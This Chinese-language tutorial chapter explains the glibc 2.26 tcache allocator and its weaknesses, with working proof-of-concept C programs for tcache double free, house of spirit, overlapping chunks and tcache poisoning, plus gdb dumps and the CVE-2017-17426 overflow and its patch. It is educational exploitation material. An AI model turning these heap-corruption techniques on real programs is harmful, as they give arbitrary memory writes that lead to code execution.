4.14 glibc tcache 机制

tcache

tcache 全名 thread local caching,它为每个线程创建一个缓存(cache),从而实现无锁的分配算法,有不错的性能提升。libc-2.26 正式提供了该机制,并默认开启,具体可以查看这次 commit

数据结构

glibc 在编译时使用 USE_TCACHE 条件来开启 tcache 机制,并定义了下面一些东西:

  1. #if USE_TCACHE
  2. /* We want 64 entries. This is an arbitrary limit, which tunables can reduce. */
  3. # define TCACHE_MAX_BINS 64
  4. # define MAX_TCACHE_SIZE tidx2usize (TCACHE_MAX_BINS-1)
  5. /* Only used to pre-fill the tunables. */
  6. # define tidx2usize(idx) (((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
  7. /* When "x" is from chunksize(). */
  8. # define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
  9. /* When "x" is a user-provided size. */
  10. # define usize2tidx(x) csize2tidx (request2size (x))
  11. /* With rounding and alignment, the bins are...
  12. idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit)
  13. idx 1 bytes 25..40 or 13..20
  14. idx 2 bytes 41..56 or 21..28
  15. etc. */
  16. /* This is another arbitrary limit, which tunables can change. Each
  17. tcache bin will hold at most this number of chunks. */
  18. # define TCACHE_FILL_COUNT 7
  19. #endif

值得注意的比如每个线程默认使用 64 个单链表结构的 bins,每个 bins 最多存放 7 个 chunk。chunk 的大小在 64 位机器上以 16 字节递增,从 24 到 1032 字节。32 位机器上则是以 8 字节递增,从 12 到 512 字节。所以 tcache bin 只用于存放 non-large 的 chunk。

然后引入了两个新的数据结构,tcache_entrytcache_perthread_struct

  1. /* We overlay this structure on the user-data portion of a chunk when
  2. the chunk is stored in the per-thread cache. */
  3. typedef struct tcache_entry
  4. {
  5. struct tcache_entry *next;
  6. } tcache_entry;
  7. /* There is one of these for each thread, which contains the
  8. per-thread cache (hence "tcache_perthread_struct"). Keeping
  9. overall size low is mildly important. Note that COUNTS and ENTRIES
  10. are redundant (we could have just counted the linked list each
  11. time), this is for performance reasons. */
  12. typedef struct tcache_perthread_struct
  13. {
  14. char counts[TCACHE_MAX_BINS];
  15. tcache_entry *entries[TCACHE_MAX_BINS];
  16. } tcache_perthread_struct;
  17. static __thread tcache_perthread_struct *tcache = NULL;

tcache_perthread_struct 包含一个数组 entries,用于放置 64 个 bins,数组 counts 存放每个 bins 中的 chunk 数量。每个被放入相应 bins 中的 chunk 都会在其用户数据中包含一个 tcache_entry(FD指针),指向同 bins 中的下一个 chunk,构成单链表。

tcache 初始化操作如下:

  1. static void
  2. tcache_init(void)
  3. {
  4. mstate ar_ptr;
  5. void *victim = 0;
  6. const size_t bytes = sizeof (tcache_perthread_struct);
  7. if (tcache_shutting_down)
  8. return;
  9. arena_get (ar_ptr, bytes);
  10. victim = _int_malloc (ar_ptr, bytes);
  11. if (!victim && ar_ptr != NULL)
  12. {
  13. ar_ptr = arena_get_retry (ar_ptr, bytes);
  14. victim = _int_malloc (ar_ptr, bytes);
  15. }
  16. if (ar_ptr != NULL)
  17. __libc_lock_unlock (ar_ptr->mutex);
  18. /* In a low memory situation, we may not be able to allocate memory
  19. - in which case, we just keep trying later. However, we
  20. typically do this very early, so either there is sufficient
  21. memory, or there isn't enough memory to do non-trivial
  22. allocations anyway. */
  23. if (victim)
  24. {
  25. tcache = (tcache_perthread_struct *) victim;
  26. memset (tcache, 0, sizeof (tcache_perthread_struct));
  27. }
  28. }

使用

触发在 tcache 中放入 chunk 的操作:

  • free 时:在 fastbin 的操作之前进行,如果 chunk size 符合要求,并且对应的 bins 还未装满,则将其放进去。

    1. #if USE_TCACHE
    2. {
    3. size_t tc_idx = csize2tidx (size);
    4. if (tcache
    5. && tc_idx < mp_.tcache_bins
    6. && tcache->counts[tc_idx] < mp_.tcache_count)
    7. {
    8. tcache_put (p, tc_idx);
    9. return;
    10. }
    11. }
    12. #endif
  • malloc 时:有三个地方会触发。

    • 如果从 fastbin 中成功返回了一个需要的 chunk,那么对应 fastbin 中的其他 chunk 会被放进相应的 tcache bin 中,直到上限。需要注意的是 chunks 在 tcache bin 的顺序和在 fastbin 中的顺序是反过来的。
    1. #if USE_TCACHE
    2. /* While we're here, if we see other chunks of the same size,
    3. stash them in the tcache. */
    4. size_t tc_idx = csize2tidx (nb);
    5. if (tcache && tc_idx < mp_.tcache_bins)
    6. {
    7. mchunkptr tc_victim;
    8. /* While bin not empty and tcache not full, copy chunks. */
    9. while (tcache->counts[tc_idx] < mp_.tcache_count
    10. && (tc_victim = *fb) != NULL)
    11. {
    12. if (SINGLE_THREAD_P)
    13. *fb = tc_victim->fd;
    14. else
    15. {
    16. REMOVE_FB (fb, pp, tc_victim);
    17. if (__glibc_unlikely (tc_victim == NULL))
    18. break;
    19. }
    20. tcache_put (tc_victim, tc_idx);
    21. }
    22. }
    23. #endif
    • smallbin 中的情况与 fastbin 相似,双链表中的剩余 chunk 会被填充到 tcache bin 中,直到上限。
    1. #if USE_TCACHE
    2. /* While we're here, if we see other chunks of the same size,
    3. stash them in the tcache. */
    4. size_t tc_idx = csize2tidx (nb);
    5. if (tcache && tc_idx < mp_.tcache_bins)
    6. {
    7. mchunkptr tc_victim;
    8. /* While bin not empty and tcache not full, copy chunks over. */
    9. while (tcache->counts[tc_idx] < mp_.tcache_count
    10. && (tc_victim = last (bin)) != bin)
    11. {
    12. if (tc_victim != 0)
    13. {
    14. bck = tc_victim->bk;
    15. set_inuse_bit_at_offset (tc_victim, nb);
    16. if (av != &main_arena)
    17. set_non_main_arena (tc_victim);
    18. bin->bk = bck;
    19. bck->fd = bin;
    20. tcache_put (tc_victim, tc_idx);
    21. }
    22. }
    23. }
    24. #endif
    • binning code(chunk合并等其他情况)中,每一个符合要求的 chunk 都会优先被放入 tcache,而不是直接返回(除非tcache被装满)。寻找结束后,tcache 会返回其中一个。
    1. #if USE_TCACHE
    2. /* Fill cache first, return to user only if cache fills.
    3. We may return one of these chunks later. */
    4. if (tcache_nb
    5. && tcache->counts[tc_idx] < mp_.tcache_count)
    6. {
    7. tcache_put (victim, tc_idx);
    8. return_cached = 1;
    9. continue;
    10. }
    11. else
    12. {
    13. #endif

触发从 tcache 中取出 chunk 的操作:

  • __libc_malloc() 调用 _int_malloc() 之前,如果 tcache bin 中有符合要求的 chunk,则直接将它返回。
  1. #if USE_TCACHE
  2. /* int_free also calls request2size, be careful to not pad twice. */
  3. size_t tbytes;
  4. checked_request2size (bytes, tbytes);
  5. size_t tc_idx = csize2tidx (tbytes);
  6. MAYBE_INIT_TCACHE ();
  7. DIAG_PUSH_NEEDS_COMMENT;
  8. if (tc_idx < mp_.tcache_bins
  9. /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
  10. && tcache
  11. && tcache->entries[tc_idx] != NULL)
  12. {
  13. return tcache_get (tc_idx);
  14. }
  15. DIAG_POP_NEEDS_COMMENT;
  16. #endif
  • bining code 中,如果在 tcache 中放入 chunk 达到上限,则会直接返回最后一个 chunk。

    1. #if USE_TCACHE
    2. /* If we've processed as many chunks as we're allowed while
    3. filling the cache, return one of the cached ones. */
    4. ++tcache_unsorted_count;
    5. if (return_cached
    6. && mp_.tcache_unsorted_limit > 0
    7. && tcache_unsorted_count > mp_.tcache_unsorted_limit)
    8. {
    9. return tcache_get (tc_idx);
    10. }
    11. #endif

    当然默认情况下没有限制,所以这段代码也不会执行:

    1. .tcache_unsorted_limit = 0 /* No limit. */
  • binning code 结束后,如果没有直接返回(如上),那么如果有至少一个符合要求的 chunk 被找到,则返回最后一个。

    1. #if USE_TCACHE
    2. /* If all the small chunks we found ended up cached, return one now. */
    3. if (return_cached)
    4. {
    5. return tcache_get (tc_idx);
    6. }
    7. #endif

另外还需要注意的是 tcache 中的 chunk 不会被合并,无论是相邻 chunk,还是 chunk 和 top chunk。因为这些 chunk 会被标记为 inuse。

安全性分析

tcache_put()tcache_get() 分别用于从单链表中放入和取出 chunk:

  1. /* Caller must ensure that we know tc_idx is valid and there's room
  2. for more chunks. */
  3. static __always_inline void
  4. tcache_put (mchunkptr chunk, size_t tc_idx)
  5. {
  6. tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  7. assert (tc_idx < TCACHE_MAX_BINS);
  8. e->next = tcache->entries[tc_idx];
  9. tcache->entries[tc_idx] = e;
  10. ++(tcache->counts[tc_idx]);
  11. }
  12. /* Caller must ensure that we know tc_idx is valid and there's
  13. available chunks to remove. */
  14. static __always_inline void *
  15. tcache_get (size_t tc_idx)
  16. {
  17. tcache_entry *e = tcache->entries[tc_idx];
  18. assert (tc_idx < TCACHE_MAX_BINS);
  19. assert (tcache->entries[tc_idx] > 0);
  20. tcache->entries[tc_idx] = e->next;
  21. --(tcache->counts[tc_idx]);
  22. return (void *) e;
  23. }

可以看到注释部分,它假设调用者已经对参数进行了有效性检查,然而由于对 tcache 的操作在 free 和 malloc 中往往都处于很靠前的位置,导致原来的许多有效性检查都被无视了。这样做虽然有利于提升执行效率,但对安全性造成了负面影响。

tcache_dup

  1. #include <stdlib.h>
  2. #include <stdio.h>
  3. int main() {
  4. void *p1 = malloc(0x10);
  5. fprintf(stderr, "1st malloc(0x10): %p\n", p1);
  6. fprintf(stderr, "Freeing the first one\n");
  7. free(p1);
  8. fprintf(stderr, "Freeing the first one again\n");
  9. free(p1);
  10. fprintf(stderr, "2nd malloc(0x10): %p\n", malloc(0x10));
  11. fprintf(stderr, "3rd malloc(0x10): %p\n", malloc(0x10));
  12. }
  1. $ ./tcache_dup
  2. 1st malloc(0x10): 0x56088c39f260
  3. Freeing the first one
  4. Freeing the first one again
  5. 2nd malloc(0x10): 0x56088c39f260
  6. 3rd malloc(0x10): 0x56088c39f260

tcache_dup 与 fastbin_dup 类似,但其实更加简单,因为它并不局限于 fastbin,只要在 tcache chunk 范围内的都可以,而且 double-free 也不再需要考虑 top 的问题,直接 free 两次就可以了。然后我们就可以得到相同的 chunk。

第一次 free 后:

  1. gdb-peda$ x/4gx 0x0000555555756260-0x10
  2. 0x555555756250: 0x0000000000000000 0x0000000000000021
  3. 0x555555756260: 0x0000000000000000 0x0000000000000000
  4. gdb-peda$ vmmap heap
  5. Start End Perm Name
  6. 0x0000555555756000 0x0000555555777000 rw-p [heap]
  7. gdb-peda$ x/10gx 0x0000555555756000+0x10
  8. 0x555555756010: 0x0000000000000001 0x0000000000000000 <-- counts
  9. 0x555555756020: 0x0000000000000000 0x0000000000000000
  10. 0x555555756030: 0x0000000000000000 0x0000000000000000
  11. 0x555555756040: 0x0000000000000000 0x0000000000000000
  12. 0x555555756050: 0x0000555555756260 0x0000000000000000 <-- entries

chunk 被放入相应的 tcache bin 中,可以看到该 tcache bin 的 counts 被设为 1,表示有 1 个 chunk,入口为 0x0000555555756260。

第二次 free 后:

  1. gdb-peda$ x/4gx 0x0000555555756260-0x10
  2. 0x555555756250: 0x0000000000000000 0x0000000000000021 <-- chunk 1 [double freed]
  3. 0x555555756260: 0x0000555555756260 0x0000000000000000
  4. gdb-peda$ x/10gx 0x0000555555756000+0x10
  5. 0x555555756010: 0x0000000000000002 0x0000000000000000 <-- counts
  6. 0x555555756020: 0x0000000000000000 0x0000000000000000
  7. 0x555555756030: 0x0000000000000000 0x0000000000000000
  8. 0x555555756040: 0x0000000000000000 0x0000000000000000
  9. 0x555555756050: 0x0000555555756260 0x0000000000000000 <-- entries

counts 变成 2,入口不变,表示 tcache bin 已经有两个 chunk 了,虽然是相同的。

两次 malloc 后:

  1. gdb-peda$ x/10gx 0x0000555555756000+0x10
  2. 0x555555756010: 0x0000000000000000 0x0000000000000000 <-- counts
  3. 0x555555756020: 0x0000000000000000 0x0000000000000000
  4. 0x555555756030: 0x0000000000000000 0x0000000000000000
  5. 0x555555756040: 0x0000000000000000 0x0000000000000000
  6. 0x555555756050: 0x0000555555756260 0x0000000000000000

于是我们得到了两个指向同一块内存区域的指针。

tcache_house_of_spirit

  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. int main() {
  5. malloc(1); // init heap
  6. fprintf(stderr, "We will overwrite a pointer to point to a fake 'smallbin' region.\n");
  7. unsigned long long *a, *b;
  8. unsigned long long fake_chunk[64] __attribute__ ((aligned (16)));
  9. fprintf(stderr, "The chunk: %p\n", &fake_chunk[0]);
  10. fake_chunk[1] = 0x110; // the size
  11. memset(fake_chunk+2, 0x41, sizeof(fake_chunk)-0x10);
  12. fprintf(stderr, "Overwritting our pointer with the address of the fake region inside the fake chunk, %p.\n", &fake_chunk[0]);
  13. a = &fake_chunk[2];
  14. fprintf(stderr, "Freeing the overwritten pointer.\n");
  15. free(a);
  16. fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunk[0], &fake_chunk[2]);
  17. b = malloc(0x100);
  18. memset(fake_chunk+2, 0x42, sizeof(fake_chunk)-0x10);
  19. fprintf(stderr, "malloc(0x100): %p\n", b);
  20. }
  1. $ ./tcache_house_of_spirit
  2. We will overwrite a pointer to point to a fake 'smallbin' region.
  3. The chunk: 0x7fffffffdb00
  4. Overwritting our pointer with the address of the fake region inside the fake chunk, 0x7fffffffdb00.
  5. Freeing the overwritten pointer.
  6. Now the next malloc will return the region of our fake chunk at 0x7fffffffdb00, which will be 0x7fffffffdb10!
  7. malloc(0x100): 0x7fffffffdb10

tcache 在释放堆块时没有对其前后堆块进行合法性校验,只需要本块对齐(2*SIZE_SZ)就可以将堆块释放到 tcache 中,而在申请时,tcache 对内部大小合适的堆块也是直接分配的,导致常见的 house_of_spirit 可以延伸到 smallbin,而且比以前更加简单。

在栈上构造 fake chunk,大小为 smallbin:

  1. gdb-peda$ x/10gx fake_chunk
  2. 0x7fffffffdad0: 0x0000000000000000 0x0000000000000110 <-- fake chunk
  3. 0x7fffffffdae0: 0x4141414141414141 0x4141414141414141
  4. 0x7fffffffdaf0: 0x4141414141414141 0x4141414141414141
  5. 0x7fffffffdb00: 0x4141414141414141 0x4141414141414141
  6. 0x7fffffffdb10: 0x4141414141414141 0x4141414141414141

free 掉之后,该 fake chunk 被放进 tcache bin:

  1. gdb-peda$ x/10gx fake_chunk
  2. 0x7fffffffdad0: 0x0000000000000000 0x0000000000000110 <-- fake chunk [be freed]
  3. 0x7fffffffdae0: 0x0000000000000000 0x4141414141414141
  4. 0x7fffffffdaf0: 0x4141414141414141 0x4141414141414141
  5. 0x7fffffffdb00: 0x4141414141414141 0x4141414141414141
  6. 0x7fffffffdb10: 0x4141414141414141 0x4141414141414141
  7. gdb-peda$ vmmap heap
  8. Start End Perm Name
  9. 0x0000555555756000 0x0000555555777000 rw-p [heap]
  10. gdb-peda$ x/30gx 0x0000555555756000+0x10
  11. 0x555555756010: 0x0000000000000000 0x0100000000000000 <-- counts
  12. 0x555555756020: 0x0000000000000000 0x0000000000000000
  13. 0x555555756030: 0x0000000000000000 0x0000000000000000
  14. 0x555555756040: 0x0000000000000000 0x0000000000000000
  15. 0x555555756050: 0x0000000000000000 0x0000000000000000
  16. 0x555555756060: 0x0000000000000000 0x0000000000000000
  17. 0x555555756070: 0x0000000000000000 0x0000000000000000
  18. 0x555555756080: 0x0000000000000000 0x0000000000000000
  19. 0x555555756090: 0x0000000000000000 0x0000000000000000
  20. 0x5555557560a0: 0x0000000000000000 0x0000000000000000
  21. 0x5555557560b0: 0x0000000000000000 0x0000000000000000
  22. 0x5555557560c0: 0x0000000000000000 0x00007fffffffdae0 <-- entries
  23. 0x5555557560d0: 0x0000000000000000 0x0000000000000000
  24. 0x5555557560e0: 0x0000000000000000 0x0000000000000000
  25. 0x5555557560f0: 0x0000000000000000 0x0000000000000000

最后 malloc 即可将 fake chunk 取出来:

  1. gdb-peda$ p b
  2. $1 = (unsigned long long *) 0x7fffffffdae0
  3. gdb-peda$ p a
  4. $2 = (unsigned long long *) 0x7fffffffdae0
  5. gdb-peda$ x/10gx fake_chunk
  6. 0x7fffffffdad0: 0x0000000000000000 0x0000000000000110 <-- new chunk
  7. 0x7fffffffdae0: 0x4242424242424242 0x4242424242424242
  8. 0x7fffffffdaf0: 0x4242424242424242 0x4242424242424242
  9. 0x7fffffffdb00: 0x4242424242424242 0x4242424242424242
  10. 0x7fffffffdb10: 0x4242424242424242 0x4242424242424242

于是我们就在得到了一个在栈上的 chunk。

tcache_overlapping_chunks

  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <stdint.h>
  4. #include <string.h>
  5. int main() {
  6. intptr_t *p1, *p2, *p3;
  7. p1 = malloc(0x50 - 8);
  8. p2 = malloc(0x20 - 8);
  9. memset(p1, 0x41, 0x50-8);
  10. memset(p2, 0x41, 0x30-8);
  11. fprintf(stderr, "Allocated victim chunk with requested size 0x48: %p\n", p1);
  12. fprintf(stderr, "Allocated sentry element after victim: %p\n", p2);
  13. int evil_chunk_size = 0x110;
  14. int evil_region_size = 0x110 - 8;
  15. fprintf(stderr, "Emulating corruption of the victim's size to 0x110\n");
  16. *(p1-1) = evil_chunk_size;
  17. fprintf(stderr, "Freed victim chunk to put it in a different tcache bin\n");
  18. free(p1);
  19. p3 = malloc(evil_region_size);
  20. memset(p3, 0x42, evil_region_size);
  21. fprintf(stderr, "Requested a chunk of 0x100 bytes\n");
  22. fprintf(stderr, "p3: %p ~ %p\n", p3, (char *)p3+evil_region_size);
  23. fprintf(stderr, "p2: %p ~ %p\n", p2, (char *)p2+0x20-8);
  24. }
  1. $ ./tcache_overlapping_chunks
  2. Allocated victim chunk with requested size 0x48: 0x555555756260
  3. Allocated sentry element after victim: 0x5555557562b0
  4. Emulating corruption of the victim's size to 0x110
  5. Freed victim chunk to put it in a different tcache bin
  6. Requested a chunk of 0x100 bytes
  7. p3: 0x555555756260 ~ 0x555555756368
  8. p2: 0x5555557562b0 ~ 0x5555557562c8

_int_free() 时,libc 完全没有对 chunk 进行检查,所以我们可以直接修改其 size,在 free 时该 chunk 就被放进了不同的 tcache bin。在下一次 malloc 时得到不一样大小的 chunk,造成堆块重叠。

首先我们分配两个 chunk:

  1. gdb-peda$ x/16gx 0x555555756260-0x10
  2. 0x555555756250: 0x0000000000000000 0x0000000000000051 <-- chunk p1
  3. 0x555555756260: 0x4141414141414141 0x4141414141414141
  4. 0x555555756270: 0x4141414141414141 0x4141414141414141
  5. 0x555555756280: 0x4141414141414141 0x4141414141414141
  6. 0x555555756290: 0x4141414141414141 0x4141414141414141
  7. 0x5555557562a0: 0x4141414141414141 0x0000000000000021 <-- chunk p2
  8. 0x5555557562b0: 0x4141414141414141 0x4141414141414141
  9. 0x5555557562c0: 0x4141414141414141 0x0000000000000411

然后修改第一个的 size 并将其释放:

  1. gdb-peda$ x/16gx 0x555555756260-0x10
  2. 0x555555756250: 0x0000000000000000 0x0000000000000110 <-- chunk p1 [be freed]
  3. 0x555555756260: 0x0000000000000000 0x4141414141414141
  4. 0x555555756270: 0x4141414141414141 0x4141414141414141
  5. 0x555555756280: 0x4141414141414141 0x4141414141414141
  6. 0x555555756290: 0x4141414141414141 0x4141414141414141
  7. 0x5555557562a0: 0x4141414141414141 0x0000000000000021 <-- chunk p2
  8. 0x5555557562b0: 0x4141414141414141 0x4141414141414141
  9. 0x5555557562c0: 0x4141414141414141 0x0000000000000411
  10. gdb-peda$ vmmap heap
  11. Start End Perm Name
  12. 0x0000555555756000 0x0000555555777000 rw-p [heap]
  13. gdb-peda$ x/30gx 0x0000555555756000+0x10
  14. 0x555555756010: 0x0000000000000000 0x0100000000000000 <-- counts
  15. 0x555555756020: 0x0000000000000000 0x0000000000000000
  16. 0x555555756030: 0x0000000000000000 0x0000000000000000
  17. 0x555555756040: 0x0000000000000000 0x0000000000000000
  18. 0x555555756050: 0x0000000000000000 0x0000000000000000
  19. 0x555555756060: 0x0000000000000000 0x0000000000000000
  20. 0x555555756070: 0x0000000000000000 0x0000000000000000
  21. 0x555555756080: 0x0000000000000000 0x0000000000000000
  22. 0x555555756090: 0x0000000000000000 0x0000000000000000
  23. 0x5555557560a0: 0x0000000000000000 0x0000000000000000
  24. 0x5555557560b0: 0x0000000000000000 0x0000000000000000
  25. 0x5555557560c0: 0x0000000000000000 0x0000555555756260 <-- entries
  26. 0x5555557560d0: 0x0000000000000000 0x0000000000000000
  27. 0x5555557560e0: 0x0000000000000000 0x0000000000000000
  28. 0x5555557560f0: 0x0000000000000000 0x0000000000000000

可以看到 chunk p1 并没有放到它应该去的 tcache bin 中,而是放到了修改 size 后对应的 tcache bin。

最后将其 malloc 出来:

  1. gdb-peda$ p p3
  2. $1 = (intptr_t *) 0x555555756260
  3. gdb-peda$ p p2
  4. $2 = (intptr_t *) 0x5555557562b0
  5. gdb-peda$ p p1
  6. $3 = (intptr_t *) 0x555555756260
  7. gdb-peda$ x/36gx 0x555555756260-0x10
  8. 0x555555756250: 0x0000000000000000 0x0000000000000110 <-- chunk p3
  9. 0x555555756260: 0x4242424242424242 0x4242424242424242
  10. 0x555555756270: 0x4242424242424242 0x4242424242424242
  11. 0x555555756280: 0x4242424242424242 0x4242424242424242
  12. 0x555555756290: 0x4242424242424242 0x4242424242424242
  13. 0x5555557562a0: 0x4242424242424242 0x4242424242424242 <-- chunk p2
  14. 0x5555557562b0: 0x4242424242424242 0x4242424242424242
  15. 0x5555557562c0: 0x4242424242424242 0x4242424242424242
  16. 0x5555557562d0: 0x4242424242424242 0x4242424242424242
  17. 0x5555557562e0: 0x4242424242424242 0x4242424242424242
  18. 0x5555557562f0: 0x4242424242424242 0x4242424242424242
  19. 0x555555756300: 0x4242424242424242 0x4242424242424242
  20. 0x555555756310: 0x4242424242424242 0x4242424242424242
  21. 0x555555756320: 0x4242424242424242 0x4242424242424242
  22. 0x555555756330: 0x4242424242424242 0x4242424242424242
  23. 0x555555756340: 0x4242424242424242 0x4242424242424242
  24. 0x555555756350: 0x4242424242424242 0x4242424242424242
  25. 0x555555756360: 0x4242424242424242 0x0000000000000000

于是 chunk p2 被 chunk p3 覆盖了。

tcache_poisoning

  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <stdint.h>
  4. #include <string.h>
  5. int main() {
  6. intptr_t *p1, *p2, *p3;
  7. size_t target[10];
  8. printf("Our target is a stack region at %p\n", (void *)target);
  9. p1 = malloc(0x30);
  10. memset(p1, 0x41, 0x30+8);
  11. fprintf(stderr, "Allocated victim chunk with requested size 0x30 at %p\n", p1);
  12. fprintf(stderr, "Freed victim chunk to put it in a tcache bin\n");
  13. free(p1);
  14. fprintf(stderr, "Emulating corruption of the next ptr\n");
  15. *p1 = (int64_t)target;
  16. fprintf(stderr, "Now we make two requests for the appropriate size so that malloc returns a chunk overlapping our target\n");
  17. p2 = malloc(0x30);
  18. memset(p2, 0x42, 0x30+8);
  19. p3 = malloc(0x30);
  20. memset(p3, 0x42, 0x30+8);
  21. fprintf(stderr, "The first malloc(0x30) returned %p, the second one: %p\n", p2, p3);
  22. }
  1. $ ./tcache_poisoning
  2. Our target is a stack region at 0x7fffffffdcc0
  3. Allocated victim chunk with requested size 0x30 at 0x555555756670
  4. Freed victim chunk to put it in a tcache bin
  5. Emulating corruption of the next ptr
  6. Now we make two requests for the appropriate size so that malloc returns a chunk overlapping our target
  7. The first malloc(0x30) returned 0x555555756670, the second one: 0x7fffffffdcc0

该实例通过破坏 tcache bin 中 chunk 的 fd 指针,将其指向不同的位置,从而改变 tcache_entrynext 指针,在 malloc 时在任意位置得到 chunk。而 tcache_get() 函数没有对此做任何的检查。

分配一个 chunk p1 后释放,该 chunk 将被放入相应的 tcache bin,其 fd 指针被清空:

  1. gdb-peda$ x/10gx (void *)p1-0x10
  2. 0x555555756660: 0x0000000000000000 0x0000000000000041 <-- chunk p1 [be freed]
  3. 0x555555756670: 0x0000000000000000 0x4141414141414141 <-- fd pointer
  4. 0x555555756680: 0x4141414141414141 0x4141414141414141
  5. 0x555555756690: 0x4141414141414141 0x4141414141414141
  6. 0x5555557566a0: 0x4141414141414141 0x0000000000020961
  7. gdb-peda$ vmmap heap
  8. Start End Perm Name
  9. 0x0000555555756000 0x0000555555777000 rw-p [heap]
  10. gdb-peda$ x/12gx 0x0000555555756000+0x10
  11. 0x555555756010: 0x0000000000010000 0x0000000000000000 <-- counts
  12. 0x555555756020: 0x0000000000000000 0x0000000000000000
  13. 0x555555756030: 0x0000000000000000 0x0000000000000000
  14. 0x555555756040: 0x0000000000000000 0x0000000000000000
  15. 0x555555756050: 0x0000000000000000 0x0000000000000000
  16. 0x555555756060: 0x0000555555756670 0x0000000000000000 <-- entries

然后修改 fd 指针指向栈上的地址 target:

  1. gdb-peda$ x/10gx (void *)p1-0x10
  2. 0x555555756660: 0x0000000000000000 0x0000000000000041 <-- chunk p1 [be freed]
  3. 0x555555756670: 0x00007fffffffdc80 0x4141414141414141 <-- fd pointer
  4. 0x555555756680: 0x4141414141414141 0x4141414141414141
  5. 0x555555756690: 0x4141414141414141 0x4141414141414141
  6. 0x5555557566a0: 0x4141414141414141 0x0000000000020961

接下来的第一次 malloc 将 chunk p1 的地方取出:

  1. gdb-peda$ x/10gx (void *)p1-0x10
  2. 0x555555756660: 0x0000000000000000 0x0000000000000041 <-- chunk p2
  3. 0x555555756670: 0x4242424242424242 0x4242424242424242
  4. 0x555555756680: 0x4242424242424242 0x4242424242424242
  5. 0x555555756690: 0x4242424242424242 0x4242424242424242
  6. 0x5555557566a0: 0x4242424242424242 0x0000000000020961
  7. gdb-peda$ x/12gx 0x0000555555756000+0x10
  8. 0x555555756010: 0x0000000000000000 0x0000000000000000
  9. 0x555555756020: 0x0000000000000000 0x0000000000000000
  10. 0x555555756030: 0x0000000000000000 0x0000000000000000
  11. 0x555555756040: 0x0000000000000000 0x0000000000000000
  12. 0x555555756050: 0x0000000000000000 0x0000000000000000
  13. 0x555555756060: 0x00007fffffffdc80 0x0000000000000000 <-- entries

可以看到 tcache 的 entries 被修改为我们伪造的 fd 地址。

第二次 malloc,虽然 tcache bin 的 counts 为 0,但它并没有做检查,直接在 entries 指向的地方返回了一个 chunk:

  1. gdb-peda$ x/10gx (void *)p3-0x10
  2. 0x7fffffffdc70: 0x0000555555756670 0x00007fffffffdc80 <-- chunk p3
  3. 0x7fffffffdc80: 0x4242424242424242 0x4242424242424242
  4. 0x7fffffffdc90: 0x4242424242424242 0x4242424242424242
  5. 0x7fffffffdca0: 0x4242424242424242 0x4242424242424242
  6. 0x7fffffffdcb0: 0x4242424242424242 0x0000000000000000

于是我们得到了一个在栈上的 chunk。

有趣的是 tcache bin 的 counts 居然产生了整数溢出(0x00-1=0xff):

  1. gdb-peda$ x/12gx 0x0000555555756000+0x10
  2. 0x555555756010: 0x0000000000ff0000 0x0000000000000000
  3. 0x555555756020: 0x0000000000000000 0x0000000000000000
  4. 0x555555756030: 0x0000000000000000 0x0000000000000000
  5. 0x555555756040: 0x0000000000000000 0x0000000000000000
  6. 0x555555756050: 0x0000000000000000 0x0000000000000000
  7. 0x555555756060: 0x00000000000000c2 0x0000000000000000

看来这个机制仍然存在很多的问题啊。

注:突然发现这个 0xff 在 unsorted bin attack 里有很巧妙的用处,参考章节 3.1.8。

这一节的代码可以在这里找到。其他的一些情况可以参考章节 3.3.6。

CTF 实例

在最近的 CTF 中,已经开始尝试使用 libc-2.26,比如章节 6.1.15、6.1.19 中的例子。

CVE-2017-17426

libc-2.26 中的 tcache 机制被发现了安全漏洞,由于 __libc_malloc() 使用 request2size() 来将所请求的分配大小转换为计算块大小,该函数不会进行整数溢出检查。所以如果请求一个非常大的堆块(接近 SIZE_MAX),将会导致整数溢出,从而导致 malloc 错误地返回了 tcache bin 里的堆块。

一个例子:

  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. int main() {
  4. void *x = malloc(10);
  5. printf("malloc(10): %p\n", x);
  6. free(x);
  7. void *y = malloc(((size_t)~0) - 2); // overflow allocation (size_t.max-2)
  8. printf("malloc(((size_t)~0) - 2): %p\n", y);
  9. }
  1. $ gcc cve201717426.c
  2. $ /usr/local/glibc-2.26/lib/ld-2.26.so ./a.out
  3. malloc(10): 0x7f3f945ed260
  4. malloc(((size_t)~0) - 2): 0x7f3f945ed260
  5. $ /usr/local/glibc-2.27/lib/ld-2.27.so ./a.out
  6. malloc(10): 0x7f399c69e260
  7. malloc(((size_t)~0) - 2): (nil)

可以看到在使用 libc-2.26 时,第二次 malloc 返回了第一次 free 的堆块。而在使用 libc-2.27 时返回 NULL,说明该问题已被修复。

patch

该漏洞在 libc-2.27 的这次 commit 中被修复。方法是用更安全的 checked_request2size() 替换 request2size(),以实现对整数溢出的检查:

  1. $ git show 34697694e8a93b325b18f25f7dcded55d6baeaf6 malloc/malloc.c | cat
  2. commit 34697694e8a93b325b18f25f7dcded55d6baeaf6
  3. Author: Arjun Shankar <arjun@redhat.com>
  4. Date: Thu Nov 30 13:31:45 2017 +0100
  5. Fix integer overflow in malloc when tcache is enabled [BZ #22375]
  6. When the per-thread cache is enabled, __libc_malloc uses request2size (which
  7. does not perform an overflow check) to calculate the chunk size from the
  8. requested allocation size. This leads to an integer overflow causing malloc
  9. to incorrectly return the last successfully allocated block when called with
  10. a very large size argument (close to SIZE_MAX).
  11. This commit uses checked_request2size instead, removing the overflow.
  12. diff --git a/malloc/malloc.c b/malloc/malloc.c
  13. index 79f0e9eac7..0c9e0748b4 100644
  14. --- a/malloc/malloc.c
  15. +++ b/malloc/malloc.c
  16. @@ -3031,7 +3031,8 @@ __libc_malloc (size_t bytes)
  17. return (*hook)(bytes, RETURN_ADDRESS (0));
  18. #if USE_TCACHE
  19. /* int_free also calls request2size, be careful to not pad twice. */
  20. - size_t tbytes = request2size (bytes);
  21. + size_t tbytes;
  22. + checked_request2size (bytes, tbytes);
  23. size_t tc_idx = csize2tidx (tbytes);
  24. MAYBE_INIT_TCACHE ();

参考资料